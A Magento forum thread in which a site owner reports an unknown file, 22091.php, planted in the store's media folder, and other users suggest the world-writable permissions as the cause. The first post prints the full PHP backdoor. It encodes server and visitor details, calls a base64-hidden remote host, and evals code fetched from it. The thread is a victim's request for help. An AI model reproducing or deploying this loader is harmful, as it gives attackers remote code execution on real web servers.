Magento - 22091.php - Technical Issues - eCommerce Software for Growth

Log In

Username or Email

Password:

Forgot Password

or
Register

Skip to site navigation »
Skip to main content »
Skip to footer content »

Magento Forum

22091.php

Anjanesh Total Posts: 136 Joined: 2008-03-15 Mumbai, India Ignore user	A file called 22091.php got inserted in my media folder. I checked out the 22091.php file and this what it is (after indenting it) : <? error_reporting(0); $a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"]:$HTTP_HOST); $b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"]:$SERVER_NAME); $c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"]:$REQUEST_URI); $d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"]:$PHP_SELF); $e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"]:$QUERY_STRING); $f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"]:$HTTP_REFERER); $g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT); $h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR); $i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME); $j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE); $z = "/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j); $f = base64_decode("cGhwc2VhcmNoLmNu"); if (basename($c) == basename($i) && isset($_REQUEST["q"])&& md5($_REQUEST["q"]) == "1f34d89add3b510a6e851c8fd9f90dc7") $f = $_REQUEST["id"]; if ((include(base64_decode("aHR0cDovL2FkczEu").$f.$z))); else if($c = file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z)) eval($c); else { $cu = curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z); curl_setopt($cu,CURLOPT_RETURNTRANSFER,1); $o = curl_exec($cu); curl_close($cu); eval($o); }; die(); ?> I dont know what it does but I did a google on site:mydomain.com and a lot of junk links are shown. Anyone else come across this ? PHP 5.2.6 \| Magento 1.1.8
	Posted: December 31 2008 \| top

Damian Culotta Total Posts: 878 Joined: 2008-12-10 Argentina Ignore user	I’m pretty sure that this file is not a Magento file. I never saw that file before into Magento code. Signature Blog http://www.damianculotta.com.ar
	Posted: December 31 2008 \| top \| # 1

Anjanesh Total Posts: 136 Joined: 2008-03-15 Mumbai, India Ignore user	Damián Culotta - 31 December 2008 01:20 PM I’m pretty sure that this file is not a Magento file. I never saw that file before into Magento code. Thats obvious. But because its in media folder, could there be a possible hole in the upload system ? Since media folder is chmoded to 777 ?
	Posted: January 1 2009 \| top \| # 2

Damian Culotta Total Posts: 878 Joined: 2008-12-10 Argentina Ignore user	There’s a secutiry problem if you set 777 to one folder. Maybe you can set regular permissions, but changing the owner of the folder. For example, apply something like this: chown -R www-data:www-data media With that change, your folder only gonna be writable for the owner, in this case, www-data, that is the user that (it depends of each configuration) runs your webserver. Signature Blog http://www.damianculotta.com.ar
	Posted: January 1 2009 \| top \| # 3

Magento Community

Magento Community

Back to top

Deleted attribute still showing...

Creating Order on Backend, Multiple Stores on Multiple Domans, Wrong Paypal Account